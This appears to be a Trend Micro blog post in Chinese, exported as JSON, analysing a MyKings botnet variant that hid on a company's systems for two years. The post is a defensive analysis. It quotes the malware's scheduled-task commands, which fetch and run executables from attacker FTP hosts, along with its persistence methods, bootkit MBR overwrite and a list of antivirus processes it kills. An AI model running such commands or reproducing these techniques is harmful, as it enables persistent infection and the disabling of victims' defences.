{"id":61824,"date":"2019-08-29T09:00:13","date_gmt":"2019-08-29T01:00:13","guid":{"rendered":"https:\/\/blog.trendmicro.com.tw\/?p=61824"},"modified":"2019-09-25T18:09:38","modified_gmt":"2019-09-25T10:09:38","slug":"mdr-%e6%89%be%e5%88%b0%e9%9a%b1%e8%97%8f%e5%9c%a8%e6%9f%90%e5%85%ac%e5%8f%b8%e7%b3%bb%e7%b5%b1%e5%85%a72%e5%b9%b4%e7%9a%84mykings%e8%ae%8a%e7%a8%ae","status":"publish","type":"post","link":"https:\/\/blog.trendmicro.com.tw\/?p=61824","title":{"rendered":"MDR \u627e\u5230\u57cb\u4f0f\u67d0\u516c\u53f8\u7cfb\u7d712\u5e74\u7684MyKings\u8b8a\u7a2e"},"content":{"rendered":"\n<div class=\"wp-block-image\"><figure class=\"alignleft\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/06\/rootkit-feature-200x200.png\" alt=\"\"\/><\/figure><\/div>\n\n\n\n<p>\u4e9e\u592a\u5730\u5340\u4e00\u5bb6\u96fb\u5b50\u516c\u53f8\u5728\u4e94\u6708\u5c0e\u5165<a href=\"https:\/\/t.rend.tw\/?i=NzkzMA\">\u8a17\u7ba1\u5f0f\u5075\u6e2c\u53ca\u56de\u61c9(<em>Managed Detection and Response<\/em>\uff0c\u7c21\u7a31MDR)&nbsp;<\/a>\u670d\u52d9\u6642\uff0c<a href=\"https:\/\/www.trendmicro.com\/zh_tw\/business\/products\/network\/advanced-threat-protection.html\">\u8da8\u52e2\u79d1\u6280\u7684Deep Discovery Inspector<\/a> \u5075\u6e2c\u5230\u4e86 <a rel=\"noreferrer noopener\" href=\"https:\/\/blog.trendmicro.com.tw\/?p=54909\" target=\"_blank\">EternalBlue(\u6c38\u6046\u4e4b\u85cd)<\/a> \u76f8\u95dc\u53ef\u7591\u6d3b\u52d5\uff0c\u9019\u6f0f\u6d1e\u653b\u64ca\u4e4b\u524d\u5e38\u88ab\u7528\u65bc<a href=\"https:\/\/blog.trendmicro.com.tw\/?cat=3220\">WannaCry(\u60f3\u54ed)\u52d2\u7d22\u75c5\u6bd2<\/a>\u3002\u6211\u5011\u767c\u73fe\u5f8c\u5411\u8a72\u516c\u53f8\u767c\u51fa\u4e86\u7b2c\u4e00\u6b21\u7684\u8b66\u5831\uff0c\u901a\u77e5\u9019\u500b\u53ef\u80fd\u7684\u5a01\u8105\u3002<\/p>\n\n\n\n<p>\u6211\u5011\u5e7e\u5929\u5f8c\u60f3\u8fa6\u6cd5\u627e\u5230\u4e86\u516c\u53f8\u5167\u90e8\u96fb\u8166\u6703\u8ddf\u653b\u64ca\u8005\u5efa\u7acb\u60e1\u610f\u901a\u8a0a\u7684\u8b49\u64da\uff0c\u516c\u53f8\u4e00\u53f0\u96fb\u8166\u6703\u9023\u5230\u4e0b\u5217\u7db2\u5740\uff08\u6211\u5011\u78ba\u8a8d\u70ba\u60e1\u610f\u7a0b\u5f0f\u4f86\u6e90 \uff09\uff1a <\/p>\n\n\n\n<ul><li>hxxp:\/\/js[.]mykings.top:280\/v[.]sct<\/li><li>hxxp:\/\/js[.]mykings.top:280\/helloworld[.]msi<\/li><\/ul>\n\n\n\n<p>\u7db2\u5740\u5305\u542b\u4e86\u55ae\u5b57\u300cmykings\u300d\uff0c\u9019\u8ddf\u6211\u5011\u4e4b\u524d\u57282017\u5e748\u6708<a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/cryptocurrency-miner-uses-wmi-eternalblue-spread-filelessly\/\">\u5206\u6790\u6bad\u5c4d\u7db2\u8def<\/a>\u6642\u6240\u770b\u5230\u7684\u547d\u4ee4\u548c\u63a7\u5236\uff08C&amp;C\uff09\u4f3a\u670d\u5668\u985e\u4f3c\u3002\u9019\u7d66\u4e86\u6211\u5011\u95dc\u65bc\u6b64\u5a01\u8105\u8eab\u4efd\u7684\u7b2c\u4e00\u500b\u7dda\u7d22\u3002<\/p>\n\n\n\n<p>\u6b64\u5916\uff0c\u6211\u5011\u767c\u73fe\u653b\u64ca\u8005\u7ac4\u6539\u4e86\u7cfb\u7d71\u767b\u9304\u6a94\uff0c\u76ee\u7684\u662f\u70ba\u4e86\u6301\u7e8c\u6027\u6a5f\u5236\u3002\u65b0\u52a0\u7684\u767b\u9304\u6a5f\u78bc\u8ca0\u8cac\u8ddf\u524d\u9762\u6240\u63d0\u5230\u7684\u7db2\u5740\u9032\u884cC&amp;C\u901a\u8a0a\uff1a<\/p>\n\n\n\n<ul><li>HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\u201d\n-Name \u201cstart\u201d<\/li><li>HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\u201d\n-Name \u201cstart1\u201d<\/li><li>HKLM\\SOFTWARE\\Microsoft\\Shared\nTools\\MSConfig\\startupreg\u201d -Name \u201cstart\u201d<\/li><li>HKLM\\SOFTWARE\\Microsoft\\Shared\nTools\\MSConfig\\startupreg\u201d -Name \u201cstart1\u201d<\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>\u60e1\u610f\u8edf\u9ad4\u5728\u88ab\u767c\u73fe\u524d\u5df2\u7d93\u96b1\u85cf\u5728\u516c\u53f8\u7cfb\u7d71\u5167\u5927\u7d042\u5e74<br><\/strong><\/h2>\n\n\n\n<p>\u66f4\u6df1\u5165\u7814\u7a76\u5f8c\uff0c\u6211\u5011\u767c\u73fe\u9019\u4e9b\u8a3b\u518a\u8868\u503c\u662f\u57282017\u5e74\u52a0\u5165\uff0c\u986f\u793a\u60e1\u610f\u8edf\u9ad4\u5728\u88ab\u767c\u73fe\u524d\u5df2\u7d93\u96b1\u85cf\u5728\u516c\u53f8\u7cfb\u7d71\u5167\u5927\u7d042\u5e74\u3002\u9019\u9020\u6210\u4e86\u53e6\u5916\u4e00\u500b\u554f\u984c\uff0c\u56e0\u70ba\u6642\u9593\u9ede\u5c0d\u78ba\u8a8dMyKings\u5be6\u969b\u5728\u7cfb\u7d71\u4e0a\u505a\u4e86\u54ea\u4e9b\u4e8b\u60c5\u5f88\u91cd\u8981\u3002\u6709\u8a31\u591a\u6bad\u5c4d\u7db2\u8def\u7d44\u4ef6\uff08\u5305\u62ecC&amp;C\u4f3a\u670d\u5668\u7db2\u5740\u548c\u4e0b\u8f09\u7db2\u5740\uff09\u90fd\u53ea\u6703\u5b58\u6d3b\u77ed\u77ed\u7684\u6642\u9593\uff0c\u975e\u5e38\u5bb9\u6613\u6d88\u5931\u3002\u8ddf\u4f7f\u7528\u5167\u5d4c\u7db2\u5740\u548c\u6a94\u6848\u7684\u75c5\u6bd2\u4e0d\u540c\uff0cMyKings\u8ddf\u8173\u672c\u7d81\u5728\u4e00\u8d77\uff0c\u53ea\u5f9e\u9060\u7aef\u4f3a\u670d\u5668\u4e0b\u8f09\u6240\u9700\u7684\u4e00\u5207\u3002<\/p>\n\n\n\n<!--more-->\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-1.png\" alt=\" Figure 1. The registry entries that were added in 2017\"\/><\/figure>\n\n\n\n<p>\u57161. 2017\u5e74\u52a0\u9032\u53bb\u7684\u767b\u9304\u6a5f\u78bc <\/p>\n\n\n\n<p>\u5728\u8abf\u67e5\u671f\u9593\uff0c\u6211\u5011\u9084\u78ba\u8a8d\u4e86\u5176\u4ed6\u5e7e\u7a2e\u6301\u7e8c\u6027\u6a5f\u5236\uff0c\u8ddf\u6211\u5011\u4e4b\u524d2017\u5e74\u7684\u7814\u7a76\u4e00\u81f4\u3002\u9664\u4e86\u81ea\u52d5\u57f7\u884c\u7684\u767b\u9304\u6a5f\u78bc\u5916\uff0c\u6211\u5011\u9084\u767c\u73fe\u4e86\u6392\u7a0b\u5de5\u4f5c\u548cWindows Management Instrumentation\uff08WMI\uff09\u7269\u4ef6\uff08\u53c3\u898b\u88681\u548c\u88682\uff09\uff1a<\/p>\n\n\n\n<table  class=\"wp-block-table table table-hover\" ><tbody><tr><td>\n  <strong>\u5de5\u4f5c\u540d\u7a31<\/strong>\n  <\/td><td>\n  <strong>\u57f7\u884c\u5b57\u4e32<\/strong>\n  <\/td><\/tr><tr><td>\n  Mysa\n  <\/td><td>\n  cmd\n  \/c echo open down[.]mysking[.]info&gt;s&amp;echo test&gt;&gt;s&amp;echo\n  1433&gt;&gt;s&amp;echo binary&gt;&gt;s&amp;echo get a.exe&gt;&gt;s&amp;echo\n  bye&gt;&gt;s&amp;ftp -s:s&amp;a.exe\u201d}\n  <\/td><\/tr><tr><td>\n  Mysa1\n  <\/td><td>\n  rundll32.exe\n  c:\\\\windows\\\\debug\\\\item.dat\n  <\/td><\/tr><tr><td>\n  Mysa2\n  <\/td><td>\n  cmd\n  \/c echo open ftp[.]ftp0118[.]info&gt;p&amp;echo test&gt;&gt;p&amp;echo\n  1433&gt;&gt;p&amp;echo get s.dat\n  c:\\\\windows\\\\debug\\\\item.dat&gt;&gt;p&amp;echo bye&gt;&gt;p&amp;ftp -s:p\u201d}\n  <\/td><\/tr><tr><td>\n  Mysa3\n  <\/td><td>\n  cmd\n  \/c echo open ftp[.]ftp0118[.]info&gt;ps&amp;echo test&gt;&gt;ps&amp;echo 1433&gt;&gt;ps&amp;echo\n  get s.rar c:\\\\windows\\\\help\\\\lsmosee.exe&gt;&gt;ps&amp;echo\n  bye&gt;&gt;ps&amp;ftp -s:ps&amp;c:\\\\windows\\\\help\\\\lsmosee.exe\u201d}\n  <\/td><\/tr><tr><td>\n  Ok\n  <\/td><td>\n  rundll32.exe\n  c:\\\\windows\\\\debug\\\\ok.dat\n  <\/td><\/tr><\/tbody><\/table>\n\n\n\n<p>\u88681. \u6392\u7a0b\u5de5\u4f5c\u548c\u5c0d\u61c9\u7684\u57f7\u884c\u5b57\u4e32<\/p>\n\n\n\n<table  class=\"wp-block-table table table-hover\" ><tbody><tr><td>\n  WMI\u7269\u4ef6\n  <\/td><td>\n  \u5099\u8a3b\n  <\/td><\/tr><tr><td>\n  __EventConsumer\n  Name\n  : fuckyoumm2_consumer\n  <\/td><td>\n  <a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-2.png\">EventConsumer\u7684\u7a0b\u5f0f\u78bc\u7247\u6bb5<\/a>\n  <\/td><\/tr><tr><td>\n  __EventFilter\n  Name:fuckyoumm2_filter\n  <\/td><td>\n  Query: select * from __timerevent where\n  timerid=\u201dfuckyoumm2_itimer\u201d\n  <\/td><\/tr><tr><td>\n  __FilterToConsumerBinding\n  <\/td><td>\n  __FilterToConsumerBinding.Consumer=\u201d\\\\\\\\.\\\\root\\\\subscription:ActiveScriptEventConsumer.Name=\n  \\\u201dfuckyoumm2_consumer\\\u201d\u201d,Filter=\u201d\\\\\\\\.\\\\root\\\\subscription:__EventFilter.Name=\\\u201dfuckyoumm2_filter\\\u201d\u201d\n  <\/td><\/tr><\/tbody><\/table>\n\n\n\n<p>\u88682. WMI\u7269\u4ef6\u548c\u76f8\u95dc\u8cc7\u8a0a<\/p>\n\n\n\n<p>\u6211\u5011\u7684\u5206\u6790\u986f\u793a\u8a72\u8b8a\u7a2e\u4fdd\u7559\u4e86\u57fa\u672c\u7684\u57fa\u790e\u8a2d\u65bd\u3002\u4f46\u9084\u662f\u6709\u4e9b\u503c\u5f97\u6ce8\u610f\u7684\u4e8b\u60c5\uff0c\u6211\u5011\u6703\u5728\u6280\u8853\u5206\u6790\u88e1\u8a73\u7d30\u8a0e\u8ad6\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>\u63d0\u4f9b\u653b\u64ca\u7684\u8108\u7d61\u8cc7\u8a0a<\/strong><\/h2>\n\n\n\n<p>\u6bad\u5c4d\u7db2\u8def\u8fc5\u901f\u666e\u53ca\u5df2\u662f\u8fd1\u671f\u6700\u56b4\u91cd\u7684\u7db2\u8def\u5b89\u5168\u554f\u984c\u4e4b\u4e00\u3002\u622a\u81f32018\u5e74\u521d\uff0c\u5149MyKings\u5c31\u5df2\u7d93<a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/smominru-botnet-infected-over-500-000-windows-machines\/\">\u611f\u67d3\u4e86\u8d85\u904e50\u842c\u53f0\u96fb\u8166\uff0c\u4e26\u6316\u7926\u6316\u4e86\u5c07\u8fd1230\u842c\u7f8e\u5143<\/a>\u3002\u5728\u63a5\u4e0b\u4f86\u7684\u5e7e\u500b\u6708\u88e1\uff0cMyKings\u4e0d\u65b7\u5730\u6539\u8b8a\u5176\u76ee\u6a19\u548c\u611f\u67d3\u65b9\u6cd5\u3002<\/p>\n\n\n\n<p><a href=\"https:\/\/www.trendmicro.com.tw\/edm\/Tracking.asp?id=2651&amp;name=20110916\">\u8da8\u52e2\u79d1\u6280<\/a>2017\u5e74\u7684\u5340\u57df\u5206\u6790\u986f\u793a\uff0c\u7576\u5e74\u5927\u90e8\u5206\u7684\u611f\u67d3\u90fd\u767c\u751f\u5728\u4e9e\u592a\u5730\u5340\u3002\u6211\u5011\u767c\u73fe\u7684\u653b\u64ca\u6642\u9593\u9ede\u53ef\u80fd\u986f\u793a\u5b83\u662f2017\u5e74\u653b\u64ca\u6d3b\u52d5\u7684\u4e00\u90e8\u5206\u3002<\/p>\n\n\n\n<p>\u7d44\u7e54\u5728\u9019\u8d77\u4e8b\u4ef6\u6240\u9762\u81e8\u7684\u4e3b\u8981\u6311\u6230\u4e4b\u4e00\u662f\u5fc5\u9808\u5c07\u6240\u6709\u770b\u4f3c\u7121\u95dc\u7684\u6307\u6a19\u62fc\u6e4a\u5728\u4e00\u8d77\uff0c\u597d\u66f4\u6e05\u695a\u5730\u4e86\u89e3\u653b\u64ca\u5168\u8c8c\u3002\u56e0\u70ba\u75c5\u6bd2\u611f\u67d3\u767c\u751f\u57282017\u5e74\uff0c\u9019\u4ee3\u8868\u60e1\u610f\u8edf\u9ad4\u6709\u8db3\u5920\u7684\u6642\u9593\u6d3b\u52d5\u4e26\u63d0\u4f9b\u5404\u7a2e\u7684\u60e1\u610f\u6a94\u6848\uff0c\u9019\u8b93\u4e8b\u60c5\u8b8a\u5f97\u66f4\u52a0\u8907\u96dc\u3002<\/p>\n\n\n\n<p>\u6aa2\u8996\u6211\u5011\u7684\u7db2\u8def\u611f\u61c9\u5668\u6642\uff0c\u6c92\u6709MyKings\u76f8\u95dc\u77e5\u8b58\u6216\u7d93\u9a57\u7684\u4eba\u53ef\u80fd\u6703\u4ee5\u70ba\u653b\u64ca\u4f7f\u7528\u4e86\u4f86\u81ea\u4e0d\u540c\u60e1\u610f\u4efd\u5b50\u7684\u591a\u7a2e\u60e1\u610f\u8edf\u9ad4\u3002\u5f9e\u57162\u53ef\u4ee5\u770b\u51fa\u5305\u542b\u4e86\u4e0d\u540c\u985e\u578b\u7684\u60e1\u610f\u8edf\u9ad4\uff0c\u5982\u5f8c\u9580\u7a0b\u5f0f\u3001\u865b\u64ec\u8ca8\u5e63\u6316\u7926\u75c5\u6bd2\u548c\u6728\u99ac\u7a0b\u5f0f\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-3.png\" alt=\" Figure 2. The attack as shown on the Trend Micro Deep Discovery Inspector dashboard\"\/><\/figure>\n\n\n\n<p>\u57162. \u8da8\u52e2\u79d1\u6280Deep Discovery\nInspector\u4e3b\u63a7\u53f0\u6240\u986f\u793a\u7684\u653b\u64ca\u6d3b\u52d5<\/p>\n\n\n\n<p>\u6b64\u5916\uff0cMyKings\u4f7f\u7528\u591a\u7a2e\u6301\u7e8c\u6027\u6a5f\u5236\uff0c\u56e0\u6b64\u5f88\u96e3\u5f9e\u53d7\u611f\u67d3\u96fb\u8166\u5167\u79fb\u9664\u3002\u6211\u5011\u6703\u5728\u4e0b\u4e00\u7bc0\u88e1\u8a73\u7d30\u95e1\u8ff0\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>\u6280\u8853\u5206\u6790<\/strong><\/h2>\n\n\n\n<p><strong>\u4f7f\u7528\u958b\u6a5f\u578b\u75c5\u6bd2\uff08bootkit<\/strong><strong>\uff09\u4f5c\u70ba\u6301\u7e8c\u6027\u6a5f\u5236<\/strong><\/p>\n\n\n\n<p>\u7576\u6211\u5011<a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/cryptocurrency-miner-uses-wmi-eternalblue-spread-filelessly\/\">\u57282017\u5e74\u9996\u6b21\u8abf\u67e5MyKings<\/a>\u6642\uff0c\u6211\u5011\u95dc\u6ce8\u7684\u662f\u865b\u64ec\u8ca8\u5e63\u6316\u7926\u6bad\u5c4d\u7db2\u8def\u5982\u4f55\u5229\u7528WMI\u4f86\u4f5c\u70ba\u6301\u7e8c\u6027\u6a5f\u5236\u3002\u5c31\u8ddfMirai\u4e00\u6a23\uff0cMyKings\u4f3c\u4e4e\u4e0d\u65b7\u5730\u6539\u8b8a\u5176\u611f\u67d3\u7a0b\u5e8f\u3002\u6211\u5011\u5728\u6b64\u4e8b\u4ef6\u5206\u6790\u7684\u8b8a\u7a2e\u4f7f\u7528\u4e86\u4e0d\u6b62\u4e00\u7a2e\u7684\u6301\u7e8c\u6027\u6a5f\u5236\uff0c\u5c31\u5982\u4e0a\u4e00\u7bc0\u6240\u8ff0\u3002\u9664\u4e86WMI\u4e4b\u5916\uff0c\u5b83\u9084\u4f7f\u7528\u4e86\u8a3b\u518a\u8868\u3001\u5de5\u4f5c\u6392\u7a0b\u548cbootkit \u2013 \u88e1\u9762\u6700\u503c\u5f97\u6ce8\u610f\u7684\u662fbootkit\uff08\u8da8\u52e2\u79d1\u6280\u5075\u6e2c\u70baTrojan.Win32.FUGRAFA.AB\uff09\u3002<\/p>\n\n\n\n<p>Bootkit\u4f7f\u7528\u4e86\u6a94\u6848\u540d\u7a31<em>lsmosee.exe<\/em>\u6216<em>s.rar<\/em>\uff08\u5728\u4eca\u5e74\u7684<a href=\"https:\/\/www.lianchaguan.com\/archives\/8036\">\u5831\u544a<\/a>\u4e2d\uff0c\u7a0b\u5f0f\u78bc\u4e5f\u53ef\u4ee5\u5728<em>ok.exe<\/em>\u5167\u627e\u5230\uff0c\u4f46\u6211\u5011\u7121\u6cd5\u78ba\u8a8d\u9019\u4e00\u9ede\uff0c\u56e0\u70ba\u7db2\u5740\u5728\u6211\u5011\u9032\u884c\u8abf\u67e5\u6642\u5df2\u7d93\u7121\u6cd5\u5b58\u53d6\uff09\u3002\u5b83\u6703\u5148\u53d6\u5f97\u78c1\u789f\u63a7\u5236\u4e26\u6aa2\u67e5\u901a\u5e38\u5305\u542bMBR\u7684\u7b2c\u4e00\u500b\u78c1\u5340\uff0c\u7136\u5f8c\u6aa2\u67e5\u5176\u7a0b\u5f0f\u78bc\u662f\u5426\u5df2\u5beb\u5165\u78c1\u789f\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-4.png\" alt=\" Figure 3. The bootkit checking the MBR\"\/><\/figure>\n\n\n\n<p>\u57163. Bootkit\u6aa2\u67e5MBR<\/p>\n\n\n\n<p>\u63a5\u4e0b\u4f86\uff0c\u5b83\u6703\u6aa2\u67e5MBR\u662f\u5426\u5df2\u7d93\u611f\u67d3\u4e86\u5176\u4ed6bootkit\uff0c\u7136\u5f8c\u6703\u8a66\u8457\u5728\u7e7c\u7e8c\u4fee\u6539\u524d\u5148\u56de\u5fa9MBR\u3002Bootkit\u63a5\u8457\u6703\u5c07\u539f\u672c\u7684MBR\u8907\u88fd\u5230\u7b2c\u4e8c\u500b\u78c1\u5340\uff0c\u7528\u81ea\u5df1\u7684\u958b\u6a5f\u78bc\u8986\u84cb\u73fe\u6709\u7684MBR\uff0c\u63a5\u8457\u7e7c\u7e8c\u5728\u78c1\u789f\u5beb\u5165\u5176\u9918\u958b\u6a5f\u6642\u6703\u57f7\u884c\u7684\u7a0b\u5f0f\u78bc\u3002<\/p>\n\n\n\n<p><strong>\u6838\u5fc3\u6a21\u5f0f\u4f8b\u7a0b<\/strong><\/p>\n\n\n\n<p>Bootkit\u6703\u5148\u8b80\u53d6\u4f4d\u5728\u7b2c\u4e09\u500b\u78c1\u5340\u7684\u7a0b\u5f0f\u78bc\u4e26\u5c07\u5176\u8f09\u5165\u5230\u66f4\u9ad8\u7684\u5730\u5740 \u2013 \u5728\u672c\u6848\u4f8b\u4e2d\u70ba0x8f000\u3002\u60e1\u610f\u7a0b\u5f0f\u78bc\u7e3d\u5171\u88ab\u5206\u4f48\u523060\u500b\u78c1\u5340\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-4-1.png\" alt=\" Figure 4. Distribution of the code to 60 sectors\"\/><\/figure>\n\n\n\n<p>\u57164. \u7a0b\u5f0f\u78bc\u5206\u4f48\u523060\u500b\u78c1\u5340<\/p>\n\n\n\n<p>\u958b\u6a5f\u78bc\u7684\u4e3b\u8981\u76ee\u7684\u662f\u70ba\u4e86\u6301\u7e8c\u6027\u548c\u81ea\u6211\u4fdd\u8b77\u3002\u5b83\u9084\u6703\u900f\u904e\u975e\u540c\u6b65\u904e\u7a0b\u547c\u53eb\uff08APC\uff09\u6ce8\u5165\u6280\u8853\u5c07\u60e1\u610f\u8edf\u9ad4\u7a0b\u5f0f\u78bc\u5beb\u5165\u4f7f\u7528\u8005\u7a7a\u9593\u7a0b\u5e8f\u3002\u70ba\u4e86\u505a\u5230\u9019\u4e00\u9ede\uff0c\u5b83\u6703\u66f4\u6539\u4e2d\u65b7\u63cf\u8ff0\u8868\u5167INT 15\u7684\u5730\u5740\uff08\u5982\u4e0b\u5716\u6240\u793a\uff09\uff0c\u4f7f\u5f97\u5728\u547c\u53ebINT15\u6642\u6703\u5c07\u57f7\u884c\u91cd\u65b0\u5c0e\u52300x8F00:0x0247\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-5.png\" alt=\" Figure 5. Changing the address of INT15 in the Interrupt Descriptor Table\"\/><\/figure>\n\n\n\n<p>\u57165. \u66f4\u6539\u4e2d\u65b7\u63cf\u8ff0\u8868\u5167INT15\u7684\u5730\u5740<\/p>\n\n\n\n<p>\u9019\u6a23\u505a\u4e86\u4e4b\u5f8c\uff0c\u539f\u672c\u7684MBR\uff08\u653e\u5728\u7b2c\u4e8c\u78c1\u5340\uff09\u6703\u5728\u555f\u52d5\u7cfb\u7d71\u524d\u57f7\u884c\u3002<\/p>\n\n\n\n<p>\u4e00\u65e6\u547c\u53ebINT15\uff08\u6700\u53ef\u80fd\u767c\u751f\u5728\u7cfb\u7d71\u958b\u6a5f\u904e\u7a0b\uff09\uff0c\u60e1\u610f\u8edf\u9ad4\u7684\u958b\u6a5f\u78bc\u6703\u9032\u4e00\u6b65\u5730\u8b8a\u52d5\u6578\u500b\u6838\u5fc3\u5c64\u7d1a\u51fd\u6578\u3002\u6700\u7d42\uff0c\u5b83\u6703\u57f7\u884cAPC\u6ce8\u5165\u4e26\u7d42\u6b62\u88683\u5167\u7684\u6240\u6709\u9632\u6bd2\u7a0b\u5e8f\u3002<\/p>\n\n\n\n<style>\n   table {border-collapse:collapse; table-layout:fixed; width:310px;}\n   table td {border:solid 1px ; width:100px; word-wrap:break-word;}\n   <\/style>\n<table  class=\"wp-block-table table table-hover\" ><tbody><tr><td>\n  avp.exe\n  <\/td><td>\n  acaegmgr.exe\n  <\/td><td>\n  sapissvc.exe\n  <\/td><\/tr><tr><td>\n  zhudongfangyu.exe\n  <\/td><td>\n  Rtvscan.exe\n  <\/td><td>\n  scsecsvc.exe\n  <\/td><\/tr><tr><td>\n  superkiller.exe\n  <\/td><td>\n  avastsvc.exe\n  <\/td><td>\n  avgsvc.exe\n  &nbsp;\n  <\/td><\/tr><tr><td>\n  360sd.exe \n  <\/td><td>\n  bdagent.exe\n  <\/td><td>\n  aycagentsrv.ayc\n  <\/td><\/tr><tr><td>\n  360safe.exe\n  <\/td><td>\n  mcshield.exe\n  <\/td><td>\n  liveupdate360.exe\n  <\/td><\/tr><tr><td>\n  360rps.exe\n  <\/td><td>\n  mcsvhost.exe\n  <\/td><td>\n  360rp\n  <\/td><\/tr><tr><td>\n  kavfs.exe\n  <\/td><td>\n  mfefire.exe\n  <\/td><td>\n  qqpctray.exe\n  <\/td><\/tr><tr><td>\n  sragent.exe\n  <\/td><td>\n  mfemms.exe\n  <\/td><td>\n  Mcshield.exe\n  <\/td><\/tr><tr><td>\n  QQPCRTP.exe\n  <\/td><td>\n  arwsrvc.exe\n  <\/td><td>\n  SHSTAT.EXE\n  <\/td><\/tr><tr><td>\n  systemaidbox.exe\n  <\/td><td>\n  dwarkdaemon.exe\n  <\/td><td>\n  naprdmgr.exe\n  <\/td><\/tr><tr><td>\n  avgnt.exe\n  <\/td><td>\n  vssery.exe\n  <\/td><td>\n  avgui.exe\n  <\/td><\/tr><tr><td>\n  avengine.exe\n  <\/td><td>\n  avguard.exe\n  <\/td><td>\n  gziface.exe\n  <\/td><\/tr><tr><td>\n  msmpeng.exe\n  <\/td><td>\n  ahnsdsv.exe\n  <\/td><td>\n  ekrn.exe\n  <\/td><\/tr><tr><td>\n  nissrv.exe\n  <\/td><td>\n  asdsvc.exe\n  <\/td><td>\n  dwengine.exe\n  <\/td><\/tr><tr><td>\n  msseces.exe\n  <\/td><td>\n  kavfswp.exe\n  <\/td><td>\n  spideragent.exe\n  <\/td><\/tr><tr><td>\n  ccSvcHst.exe\n  <\/td><td>\n  mbamservice.exe\n  <\/td><td>\n  bdagent.exe\n  <\/td><\/tr><tr><td>\n  ekrn.exe\n  <\/td><td>\n  mbam.exe\n  <\/td><td>\n  smsvchost.exe\n  <\/td><\/tr><tr><td>\n  nod32krn.exe\n  <\/td><td>\n  qhpisvr.exe\n  <\/td><td>\n  avastui.exe\n  <\/td><\/tr><tr><td>\n  aswidsagenta.exe\n  <\/td><td>\n  quhlpsvc.exe\n  <\/td><td>\n  ksafe.exe\n  <\/td><\/tr><tr><td>\n  afwserv.exe\n  <\/td><td>\n  savservice.exe\n  <\/td><td>\n  &nbsp;\n  <\/td><\/tr><tr><td>\n  v3svc.exe\n  <\/td><td>\n  hipsmain.exe\n  <\/td><td>\n  &nbsp;\n  <\/td><\/tr><tr><td>\n  &nbsp;\n  <\/td><td>\n  hipsdaemon.exe\n  <\/td><td>\n  &nbsp;\n  <\/td><\/tr><\/tbody><\/table>\n\n\n\n<p>\u88683. \u88abbootloader\u7d42\u6b62\u7684\u7a0b\u5e8f\u5217\u8868<\/p>\n\n\n\n<p>\u6703\u88ab\u6ce8\u5165\u7a0b\u5f0f\u78bc\u7684\u7a0b\u5e8f\uff08Winlogon\u3001\u6a94\u6848\u7e3d\u7ba1\u6216Svchost\uff09\u6839\u64daWindows\u7248\u672c\u7b49\u689d\u4ef6\u4e0d\u540c\u800c\u6709\u6240\u4e0d\u4e00\u6a23\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-6.png\" alt=\" Figure 6. The code being injected into explorer.exe\"\/><\/figure>\n\n\n\n<p>\u57166. \u6ce8\u5165explorer.exe\u7684\u7a0b\u5f0f\u78bc<\/p>\n\n\n\n<p>\u5982\u679c\u986f\u793a\u5931\u6557\uff0c\u5b83\u6703\u6539\u6ce8\u5165svchost.exe\u3002<\/p>\n\n\n\n<p><strong>\u4f7f\u7528\u8005\u6a21\u5f0f\u7a0b\u5e8f\uff08winlogon.exe\/explorer.exe\/svchost.exe<\/strong><strong>\uff09<\/strong><\/p>\n\n\n\n<p>\u6ce8\u5165\u7684\u4f7f\u7528\u8005\u7a7a\u9593\u7a0b\u5f0f\u78bc\u4e3b\u8981\u662f\u6703\u5f9eC&amp;C\u4f3a\u670d\u5668\u4e0b\u8f09\u4e00\u6bb5\u7a0b\u5f0f\u78bc\uff0c\u5176\u5730\u5740\u4f86\u81ea<em>hxxp[:\/\/]www[.]upme0611[.]info\/address[.]txt<\/em>\u3002<em>address.txt<\/em>\u7684\u5167\u5bb9\u96a8\u6642\u9593\u800c\u8b8a\u5316\u3002\u5728\u6211\u5011\u7684\u6e2c\u8a66\u671f\u9593\uff0c\u5b83\u5305\u542b\u4e86\u4ee5\u4e0b\u5167\u5bb9\uff1a<\/p>\n\n\n\n<table  class=\"wp-block-table table table-hover\" ><tbody><tr><td>\n  <em>[main]<\/em>\n  <em>&nbsp;<\/em>\n  <em>count=6<\/em>\n  <em>&nbsp;<\/em>\n  <em>ip1=http[:\/\/]208.110.71.194<\/em>\n  <em>&nbsp;<\/em>\n  <em>ip2=http[:\/\/]80.85.152.247<\/em>\n  <em>&nbsp;<\/em>\n  <em>ip3=http[:\/\/]66.117.2.182<\/em>\n  <em>&nbsp;<\/em>\n  <em>ip4=http[:\/\/]70.39.124.70<\/em>\n  <em>&nbsp;<\/em>\n  <em>ip5=http[:\/\/]150.107.76.227<\/em>\n  <em>&nbsp;<\/em>\n  <em>ip6=http[:\/\/]103.213.246.23<\/em>\n  <em>&nbsp;<\/em>\n  <em>[update]<\/em>\n  